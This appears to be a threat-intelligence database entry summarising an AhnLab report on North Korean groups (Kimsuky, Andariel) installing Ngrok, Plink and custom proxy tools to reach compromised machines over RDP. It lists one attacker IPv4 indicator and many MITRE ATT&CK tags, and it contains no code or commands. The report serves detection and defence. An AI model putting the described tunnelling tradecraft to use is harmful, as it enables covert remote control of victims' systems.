AhnLab EDR을 활용한 Proxy 도구 탐지

2024-11-26 Ahnlab Detecting Proxy Tools with AhnLab EDR

https://asec.ahnlab.com/ko/84754/

Thumbnail for AhnLab EDR을 활용한 Proxy 도구 탐지

AhnLab reports that attackers often install proxy tools after compromise to reach infected systems by RDP when the systems sit behind NAT. The Korean-language article cites Ngrok, Plink, and custom proxy tools, including Kimsuky and Andariel cases where operators exposed port 3389 for remote desktop control. It also notes an Andariel proxy tool that matched Lazarus tooling from 2021 and Kimsuky samples where proxy tools were newly identified across attacks. The defensive value is endpoint telemetry for Ngrok, Plink, and suspicious proxy execution that can reveal remote control and persistence activity before attackers deepen access.

Indicators of Compromise

Type Value First Seen Last Seen
IPv4 172.93.181.238 2024-11-26 2024-11-26

Related Actors

First seen: Jul 2017
Last seen: May 2026

Related Reports

2024-07-19 • 65% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Andariel, Kimsuky, Lazarus
« Back